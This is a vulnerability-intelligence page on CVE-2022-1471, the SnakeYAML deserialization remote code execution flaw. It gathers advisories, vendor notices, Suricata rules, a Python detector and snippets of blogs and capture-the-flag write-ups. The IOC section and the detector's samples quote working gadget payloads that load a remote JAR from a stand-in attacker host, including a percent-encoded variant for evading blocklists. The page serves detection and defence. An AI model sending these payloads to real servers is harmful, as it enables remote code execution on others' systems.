CVE-2022-1471
Published: 2022-12-01
Priority: P1 · 83 · critical · CVSS 3.1 base score 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Flags: EXPLOIT
EPSS: 99.61% (99.9th percentile)
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing YAML content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConstructor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | submarine | >= 0.7.0 < 0.8.0 | 0.8.0 |
| apache_software_foundation | apache_submarine | >= 0.7.0 < 0.8.0 | 0.8.0 |
| debian | snakeyaml | — | — |
| snakeyaml_project | snakeyaml | < 2.0 | 2.0 |
Detection & IOCs (extracted from sources)
Payload patterns quoted by the sources:
- command: `!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://your-server/yaml-payload.jar"]]]]`
- command: `!!javax.script.S%63riptEngin%65Manager [!!java.net.URLCl%61ssLoader [[!!java.net.URL ["http://attacker.example.com/"]]]]`
Detection guidance:
- Detect CVE-2022-1471 exploitation attempts by monitoring HTTP request bodies for SnakeYAML deserialization gadget patterns, specifically the `!!` tag prefix combined with `javax.script.ScriptEngineManager` or `java.net.URLClassLoader` class instantiation strings.
- Blocklist bypass via URL/percent-encoding of Java class names in YAML payloads (e.g. `S%63riptEngin%65Manager`, `URLCl%61ssLoader`): detection rules must decode percent-encoded characters before matching against blocklists.
- Monitor for outbound HTTP requests from application servers fetching remote JAR files (e.g. `yaml-payload.jar`) shortly after receiving YAML content-type POST requests; this indicates successful SnakeYAML RCE class loading.
- For Apache Submarine, monitor POST requests to YAML endpoints (application/yaml content type) handled by YamlEntityProvider's readFrom method for deserialization gadget payloads.
- For TorchServe (ShellTorch), chain detection: watch for model upload requests containing YAML files with SnakeYAML gadget tags, especially when the management interface is bound to 0.0.0.0 instead of localhost.
- Identify vulnerable SnakeYAML versions (prior to 2.0) in software inventory and dependency scans; versions ≤ 1.30 are confirmed affected.
- For Atlassian products, monitor the Assets Discovery agent communication port (default 51337) for unexpected traffic as a lateral indicator of CVE-2022-1471 exploitation attempts in Jira environments.
Notes:
- The exploit payload using percent-encoded class names (e.g. `S%63riptEngin%65Manager`) bypasses simple string-based blocklists; detection rules relying on plain-text keyword matching will miss URL-encoded variants.
- CVE-2022-1471 affects SnakeYAML by default design: arbitrary Java class instantiation from untrusted YAML is enabled out of the box, meaning any application using SnakeYAML to parse untrusted input is potentially vulnerable regardless of application-level controls.
- For TorchServe/ShellTorch, CVE-2022-1471 is most dangerous when chained with the unauthenticated management interface misconfiguration (bound to 0.0.0.0) and the CVE-2023-43654 SSRF; standalone exploitation requires the ability to upload a model.
- Apache Submarine's fix replaces SnakeYAML with jackson-dataformat-yaml; cherry-picking PR #1054 and rebuilding the submarine-server image is the workaround for versions < 0.8.0 that cannot upgrade.
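The detection logic described in the guidance above, as an added example that is not part of any source quoted on this page: percent-decode the request body first, then look for `!!` global tags naming the gadget classes the notes list. The sample bodies are constructed from the payload patterns quoted above, and the gadget-class list is an assumption limited to the classes this page names; decoding is repeated until stable, which goes beyond the single-encoded case in the notes.

```python
import re
from urllib.parse import unquote

# Java classes named in this page's detection notes. This list is an assumption:
# extend it with whatever gadget classes your own threat model covers.
GADGET_CLASSES = frozenset({
    "javax.script.ScriptEngineManager",
    "java.net.URLClassLoader",
})

# A SnakeYAML global tag: '!!' followed by a dotted, fully-qualified Java class name.
# Built-in YAML tags such as !!str or !!timestamp contain no dot and are not matched.
TAG_RE = re.compile(r"!!([A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+)")


def normalize(body: str, max_rounds: int = 5) -> str:
    """Percent-decode until the text stops changing. A single round defeats the
    S%63riptEngin%65Manager bypass; repeating it is conservative for deployments
    where a proxy in front of the application decodes once before forwarding."""
    current = body
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def find_gadget_tags(body: str) -> list[str]:
    """Return the gadget class names referenced by !! tags in the body,
    in order of appearance, after percent-decoding."""
    decoded = normalize(body)
    return [m.group(1) for m in TAG_RE.finditer(decoded) if m.group(1) in GADGET_CLASSES]


def classify_request(content_type: str, body: str) -> dict:
    """Score one HTTP request body. A YAML content type raises confidence, but
    every body is inspected because the server-side parser, not the header,
    decides how the bytes are handled."""
    hits = find_gadget_tags(body)
    return {
        "alert": bool(hits),
        "classes": hits,
        "was_encoded": normalize(body) != body,
        "yaml_content_type": "yaml" in content_type.lower(),
    }


# Constructed sample request bodies, built from the payload patterns quoted on this page.
SAMPLES = {
    "plain": (
        'command: !!javax.script.ScriptEngineManager '
        '[!!java.net.URLClassLoader [[!!java.net.URL ["http://your-server/yaml-payload.jar"]]]]'
    ),
    "encoded": (
        'command: !!javax.script.S%63riptEngin%65Manager '
        '[!!java.net.URLCl%61ssLoader [[!!java.net.URL ["http://attacker.example.com/"]]]]'
    ),
    # Constructed: double-encoded variant, only caught because decoding repeats.
    "double_encoded": 'command: !!javax.script.S%2563riptEngin%2565Manager []',
    "benign": "name: training-job\nreplicas: 3\ncreated: !!timestamp 2022-12-01\n",
}


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, classify_request("application/yaml", body))
```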
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| ghsa | — | 9.8 | CRITICAL | — |
| osv | — | 9.8 | CRITICAL | — |
| vendor_oracle | — | 9.8 | HIGH | — |
| vendor_debian | — | 8.3 | LOW | — |
| vendor_redhat | — | 8.3 | HIGH | — |
GHSA · 2023-11-20 · CVSS 9.8 · CVE-2023-46302 [CRITICAL] CWE-502
Deserialization of Untrusted Data in apache-submarine
Apache Software Foundation Apache Submarine has a bug when serializing against yaml. The bug is caused by snakeyaml (https://nvd.nist.gov/vuln/detail/CVE-2022-1471).
Apache Submarine uses JAXRS to define REST endpoints. In order to handle YAML requests (using application/yaml content-type), it defines a YamlEntityProvider entity provider that will process all incoming YAML requests. In order to unmarshal the request, the readFrom method is invoked, passing the entityStream containing the user-supplied data in `submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java`.
We have now fixed this issue in the new version by replacing it with `jackson-dataformat-yaml`.
This issue affects Apache Submarine: from 0
OSV · 2023-11-20 · CVSS 9.8 · CVE-2023-46302 [CRITICAL]
CVE-2023-46302: Apache Software Foundation Apache Submarine has a bug when serializing against yaml
Apache Software Foundation Apache Submarine has a bug when serializing against yaml. The bug is caused by snakeyaml (https://nvd.nist.gov/vuln/detail/CVE-2022-1471).
Apache Submarine uses JAXRS to define REST endpoints. In order to handle YAML requests (using application/yaml content-type), it defines a YamlEntityProvider entity provider that will process all incoming YAML requests. In order to unmarshal the request, the readFrom method is invoked, passing the entityStream containing the user-supplied data in `submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java`.
We have now fixed this issue in the new version by replacing it with `jackson-dataformat-yaml`.
This issue affects Apache Submarine: from 0.7.0 before 0.8.0. Users are recommended to upgrade to
OSV · 2022-12-12 · CVE-2022-1471 [HIGH]
SnakeYaml Constructor Deserialization Remote Code Execution
### Summary
SnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows any type to be deserialized given the following line:
```java
new Yaml(new Constructor(TestDataClass.class)).load(yamlContent);
```
Types do not have to match the types of properties in the target class. A `ConstructorException` is thrown, but only after a malicious payload is deserialized.
### Severity
High, lack of type checks during deserialization allows remote code execution.
### Proof of Concept
Execute `bash run.sh`. The PoC uses `Constructor` to deserialize a payload for RCE. RCE is demonstrated by using a payload which performs an HTTP request to http://127.0.0.1:8000.
Example output of successful run of proof of concept:
```
$ bash run.sh
[+
```
OSV · 2022-12-01 · CVSS 9.8 · CVE-2022-1471 [CRITICAL]
CVE-2022-1471: SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing YAML content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConstructor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.
Oracle · vendor_oracle · 2024-04-15 · CVSS 9.8 · CVE-2022-1471 [HIGH]
Oracle Fusion Middleware Risk Matrix: Third Party (SnakeYAML) vulnerability
CVE: CVE-2022-1471
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuapr2024 (APR 2024)
Oracle · vendor_oracle · 2024-01-15 · CVSS 9.8 · CVE-2022-1471 [HIGH]
Oracle Communications Applications Risk Matrix: PSR Designer (SnakeYAML) vulnerability
CVE: CVE-2022-1471
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujan2024 (JAN 2024)
Oracle · vendor_oracle · 2023-10-15 · CVSS 9.8 · CVE-2022-1471 [HIGH]
Oracle Financial Services Applications Risk Matrix: Installer (SnakeYAML) vulnerability
CVE: CVE-2022-1471
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuoct2023 (OCT 2023)
Oracle · vendor_oracle · 2023-07-15 · CVSS 9.8 · CVE-2022-1471 [HIGH]
Oracle Communications Applications Risk Matrix: REST API (SnakeYAML) vulnerability
CVE: CVE-2022-1471
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujul2023 (JUL 2023)
Oracle · vendor_oracle · 2023-04-15 · CVSS 9.8 · CVE-2022-1471 [HIGH]
Oracle Communications Applications Risk Matrix: Vision (SnakeYAML) vulnerability
CVE: CVE-2022-1471
CVSS: 9.8
Protocol: HTTPS
Remote exploit: Yes
Affected versions: Network
Advisory: cpuapr2023 (APR 2023)
Red Hat · vendor_redhat · 2022-10-13 · CVSS 8.3 · CVE-2022-1471 [HIGH] CWE-502
SnakeYaml: Constructor Deserialization Remote Code Execution
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing YAML content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConstructor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.
A flaw was found in the SnakeYaml package. This flaw allows an attacker to benefit from remote code execution by sending malicious YAML content and this content being deserialized by the constructor. Deserialization is unsafe and leads to Remote Code Execution (RCE).
Statement: In the Red Hat Process Automation 7 (RHPAM) the untrusted, malicious YAML file for deserialization by the vu
Debian · vendor_debian · 2022 · CVSS 8.3 · CVE-2022-1471 [HIGH]
CVE-2022-1471: snakeyaml - SnakeYaml's Constructor() class does not restrict types which can be instantiate...
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing YAML content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConstructor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.
Scope: local
bookworm: open
bullseye: open
forky: open
sid: open
trixie: open
Suricata · 2023-12-12 · CVSS 8.3 · CVE-2022-1471 [HIGH]
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M1
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M1"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|6.1"; fast_pattern; pcre:"/^[345]\./R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-application-activity;
Suricata · 2023-12-12 · CVSS 8.3 · CVE-2022-1471 [HIGH]
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M1
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M1"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|8|2e|"; fast_pattern; pcre:"/^(?:[012]\.|3\.0)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-application-activity; s
Suricata · 2023-12-12 · CVSS 8.3 · CVE-2022-1471 [HIGH]
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M1
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M1"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|7|2e|"; fast_pattern; pcre:"/^(?:1(?:3\.(?:[023456789]|1[01234567]?)|[01245678]?\.|9\.\d)|(?:[03456789]|20?)\.)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference
Suricata · 2023-12-12 · CVSS 8.3 · CVE-2022-1471 [HIGH]
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M2
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M2"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|li|20|class|3d 22|print|2d|only|22 3e|Printed|20|by|20|Atlassian|20|Confluence|20|7|2e|"; fast_pattern; pcre:"/^(?:1(?:3\.(?:[023456789]|1[01234567]?)|[01245678]?\.|9\.\d)|(?:[03456789]|20?)\.)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-12961710
Suricata · 2023-12-12 · CVSS 8.3 · CVE-2022-1471 [HIGH]
ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M2
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M2"; flow:established,to_client; http.response_body; content:"data|2d|name|3d 22|jira|22 20|data|2d|version|3d 22|9|2e|"; fast_pattern; pcre:"/^(?:4\.(?:[023456789]|1[012]?)|1(?:1\.[01]|0\.)|[56789]\.)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-application-activity; sid:2049646; rev:1; metadata:affected_product Atlassian, attack_target Web
Suricata · 2023-12-12 · CVSS 8.3 · CVE-2022-1471 [HIGH]
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M2
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M2"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|li|20|class|3d 22|print|2d|only|22 3e|Printed|20|by|20|Atlassian|20|Confluence|20|8|2e|"; fast_pattern; pcre:"/^(?:[012]\.|3\.0)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-appli
Suricata · 2023-12-12 · CVSS 8.3 · CVE-2022-1471 [HIGH]
ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M1
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M1"; flow:established,to_client; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|9|2e|"; fast_pattern; pcre:"/^(?:4\.(?:[023456789]|1[012]?)|1(?:1\.[01]|0\.)|[56789]\.)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-application-activity; sid:2049645; rev:1; metadata:affected_product Atlassian, a
Suricata · 2023-12-12 · CVSS 8.3 · CVE-2022-1471 [HIGH]
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M2
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M2"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|li|20|class|3d 22|print|2d|only|22 3e|Printed|20|by|20|Atlassian|20|Confluence|20|6.1"; fast_pattern; pcre:"/^[345]\./R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-appl
Suricata · 2023-12-12 · CVSS 8.3 · CVE-2022-1471 [HIGH]
ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.12.0
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.12.0"; flow:established,to_client; http.response_body; content:"Atlassian|20|Bitbucket|20 3c|span|20|"; fast_pattern; content:"data|2d|system|2d|build|2d|number|3d 22|"; within:250; content:"|22 3e 20|v8|2e|"; within:50; pcre:"/^(?:1(?:0\.[0123]|1\.[012]|2\.0|\.)|8\.[0123456]|[0234567]\.|9\.[0123])/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:
Suricata · 2023-12-12 · CVSS 8.3 · CVE-2022-1471 [HIGH]
ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 7.17.x - 7.21.15
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 7.17.x - 7.21.15"; flow:established,to_client; http.response_body; content:"Atlassian|20|Bitbucket|20 3c|span|20|"; fast_pattern; content:"data|2d|system|2d|build|2d|number|3d 22|"; within:250; content:"|22 3e 20|v7|2e|"; within:50; pcre:"/^(?:2(?:1\.(?:[023456789]|1[012345]?)|0\.)|1[789]\.)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-applica
Qualys · blogs_qualys · 2024-04-17
Oracle Security Updates, April 2024: Critical Patch | Qualys
#### Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
- Rapid Response with Patch Management (PM)
Oracle released its second quarterly edition of Critical Patch Update, which contains patches for 441 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in various product families, including third-party components in Oracle products.
In the second quarterly Oracle Critical Patch Update, Oracle Communications received the highest number of patches, 93, constituting about 21% of the total patches released. Oracle Fusion Middleware and Oracle Financial Services Applicat
Qualys · blogs_qualys · 2024-01-17
Oracle Patch Update, January 2024 Security Update Review
## Table of Contents
Qualys QID Coverage
Notable Oracle Vulnerabilities Patched
Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Oracle has released its first quarterly edition of Critical Patch Update, which contains patches for 389 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in a wide range of product families, including Oracle code and third-party components included in Oracle products.
In the first quarterly Oracle Critical Patch Update, Oracle Financial Services Applications received the highest number of patches, 71, constituting 18% of the total patches released. Oracle Communications and Oracle Communications Applications follow
Checkpoint · blogs_checkpoint · 2023-12-11 · CVE-2023-40088
11th December – Threat Intelligence Report
## 11th December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 11th December, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
The American Greater Richmond Transit Company (GRTC), which provides services for millions of people, has been a victim of cyber-attack that impacted certain applications and parts of the GRTC network. The Play ransomware gang claimed responsibility for the attack.
Check Point Harmony Endpoint and Threat Emulation prov
Bleepingcomputer · blogs_bleepingcomputer · 2023-12-06 · CVSS 8.3 · [HIGH]
## Atlassian patches critical RCE flaws across multiple products
By Bill Toulas
Atlassian has published security advisories for four critical remote code execution (RCE) vulnerabilities impacting Confluence, Jira, and Bitbucket servers, along with a companion app for macOS.
All security issues addressed received a critical-severity score of at least 9.0 out of 10, based on Atlassian's internal assessment. However, the company advises companies to evaluate applicability according to their IT environment.
The company marked none of the security issues as being exploited in the wild. However, due to the popularity of Atlassian products and their extensive deployment in corporate environments, system administrators should prioritize applying the available updates.
The set of four RCE vuln
Qualys · blogs_qualys · 2023-10-18
Oracle Patch Tuesday, October 2023 Security Update Review | Qualys
#### Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
- Rapid Response with Patch Management (PM)
Oracle has released its fourth quarterly edition of Critical Patch Update, which contains a group of patches for 387 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in Oracle code and third-party components included in Oracle products.
During the Q4 2023 Oracle Critical Patch Update, Oracle Financial Services Applications received the highest number of 103 patches, constituting 26% of the total patches released. Oracle Communications and Oracle Fusion Middleware fo
Bleepingcomputer · blogs_bleepingcomputer · 2023-10-03 · CVSS 8.3 · [HIGH]
## ShellTorch flaws expose AI servers to code execution attacks
By Bill Toulas
A set of critical vulnerabilities dubbed 'ShellTorch' in the open-source TorchServe AI model-serving tool impact tens of thousands of internet-exposed servers, some of which belong to large organizations.
TorchServe, maintained by Meta and Amazon, is a popular tool for serving and scaling PyTorch (machine learning framework) models in production.
The library is primarily used by those engaged in AI model training and development, from academic researchers to big firms like Amazon, OpenAI, Tesla, Azure, Google, and Intel.
The TorchServe flaws discovered by the Oligo Security research team can lead to unauthorized server access and remote code execution (RCE) on vulnerable instances.
## The ShellTorch vulner
Qualys
Oracle Patch Tuesday, July 2023 Security Update Review
blogs_qualys·2023-07-19
Oracle Patch Tuesday, July 2023 Security Update Review
## Table of Contents
Qualys QID Coverage
Notable Oracle Vulnerabilities Patched
Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Rapid Response with Patch Management (PM)
Oracle has released its third quarterly edition of Critical Patch Update, which contains a group of patches for 508 security vulnerabilities. Some of the vulnerabilities addressed this month impact more than one product. These patches address vulnerabilities in Oracle code and third-party components included in Oracle products.
During Q3 2023 Oracle Critical Patch Update, the Oracle Financial Services Applications received the highest number of 147 patches, constituting 29% of the total patches released. Oracle Communications and Oracle Fusion Middleware followed, with
Qualys
Oracle Security Updates: Critical Patch April 2023 Advisory | Qualys
blogs_qualys·2023-04-19
Oracle Security Updates: Critical Patch April 2023 Advisory | Qualys
#### Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
- Rapid Response with Patch Management (PM)
Oracle has released the second quarterly edition of Critical Patch Update, which contains a group of patches for 433 security vulnerabilities. Some of the vulnerabilities addressed this month impact various products. These patches address vulnerabilities in Oracle code and third-party components included in Oracle products.
During Q2 2023 Oracle Critical Patch Update, the Oracle Communications product suite recorded the highest number of patches at 77, constituting 17% of the total patches released. The Oracle Financial Services Applications and Oracle Fusion Mi
Greynoiseio
CVE-2022-1471: SnakeYAML Deserialization Deep Dive
blogs_greynoiseio·CVSS 8.3
[HIGH] CVE-2022-1471: SnakeYAML Deserialization Deep Dive
Huntress
CVE-2022-1471 Vulnerability: Analysis, Impact, Mitigation | Huntress
blogs_huntress·CVSS 9.8
CVE-2022-1471 [CRITICAL] CVE-2022-1471 Vulnerability: Analysis, Impact, Mitigation | Huntress
## CVE-2022-1471 Vulnerability
Published: 11/21/2025
Written by: Lizzie Danielson
## What is CVE-2022-1471 vulnerability?
CVE-2022-1471 is a critical remote code execution (RCE) vulnerability found in the SnakeYAML library, a popular YAML parsing tool used in multiple software products. This vulnerability enables malicious actors to execute arbitrary code by delivering specially crafted YAML content to affected systems. With a CVSS score of 9.8, CVE-2022-1471 poses a severe threat to confidentiality, integrity, and availability.
## When was it discovered?
CVE-2022-1471 was publicly disclosed on April 4, 2022. The vulnerability was identified by security researchers investigating unsafe deserialization practices within SnakeYAML's parsing process. The vendor acted promptly, releasing
HackerOne
The `io.kubernetes.client.util.generic.dynamic.Dynamics` contains a code execution vulnerability due to SnakeYAML
hackerone·2023-04-25·CVSS 6.7
[MEDIUM] The `io.kubernetes.client.util.generic.dynamic.Dynamics` contains a code execution vulnerability due to SnakeYAML
The `io.kubernetes.client.util.generic.dynamic.Dynamics` contains a code execution vulnerability due to SnakeYAML
## Summary:
If the `io.kubernetes.client.util.generic.dynamic.Dynamics` is used to deserialize a `DynamicKubernetesObject` from untrusted YAML, an attacker can achieve code execution inside of the JVM.
Since this is a part of the public API, downstream consumers can be using this API in a way that leaves them vulnerable. I have found no users of this class on GitHub outside of this project's unit tests. But that doesn't mean there are no users of this API. Someone built it for a reason, right?
## Component Version:
Kubernetes Java Client version 17.0.0
## Steps To Reproduce:
1. Host a server with a JAR file containing the following code:
```java
package org.jlleitschuh
```
Bugzilla
CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution
bugzilla·2022-12-01·CVSS 9.8
CVE-2022-1471 [CRITICAL] CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution
CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConstructor when parsing untrusted content to restrict deserialization.
Discussion:
This issue has been addressed in the following products:
Red Hat build of Eclipse Vert.x 4.3.4
Via RHSA-2022:9032 https://access.redhat.com/errata/RHSA-2022:9032
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 8
Via RHSA-2022:9058 https://access.redhat.com/errata/RHSA-2022:9058
---
Hello, when can we expect to see an update for Rhel 8.6 EUS since the rating is "I
CTF
remedyctf / healthcheck
ctf_writeups·2025
remedyctf / healthcheck
# HealthCheck as a Service: SnakeYAML Deserialization Leading to Remote Code Execution
In this CTF challenge, we explore a vulnerability in a Spring Boot health check service that processes YAML configurations. The challenge demonstrates how insufficient input validation combined with an outdated SnakeYAML library can lead to remote code execution through YAML deserialization.
## Challenge Overview
The challenge presents us with a Spring Boot web service that performs database health checks where:
- Users can submit database configurations in YAML format
- The service attempts to validate and parse the YAML input
- The parsed configuration is used to test database connectivity
- A simple input validation mechanism blocks certain suspicious keywords
The system implements some standard s
CTF
Watersnake / README
ctf_writeups·2023·CVSS 8.3
[HIGH] Watersnake / README
# Watersnake
> As the United Nations of Zenium and the Board of Arodor engage in a fierce competition to establish a colony on Mars using Vitalium, state hackers from UNZ identify an exposed instance of the critical facility water management software, Watersnakev3, in one of Arodor's main water treatment plants. The objective is to gain control over the water supply and weaken Arodor's infrastructure.
## About the Challenge
We were given the source code (you can download it [here](web_watersnake.zip)). Here is a preview of the website.
There is also another feature where we can submit our own YAML configuration.
## How to Solve?
If we check the `Controller.java` code, especially the function called `update()`:
```java
import org.yaml.snakeyaml.Yaml;
...
...
```
CTF
HackyEaster_2023 / level7-4-digital-snake-art
ctf_writeups·2023
HackyEaster_2023 / level7-4-digital-snake-art
---
layout: writeup
title: Digital Snake Art
level: 7 # optional, for events that use levels (like HackyEaster)
difficulty: medium # easy/medium/hard etc, if applicable
points: 200 # if used
categories: [web] # e.g. crypto, pwn, reversing
tags: [java, yaml, deserialisation] # anything notable about challenge/solution, vuln/tools/etc
flag: he2023{0n3_d03s_n0t_s1mply_s0lv3_th1s_chllng!}
---
## Challenge
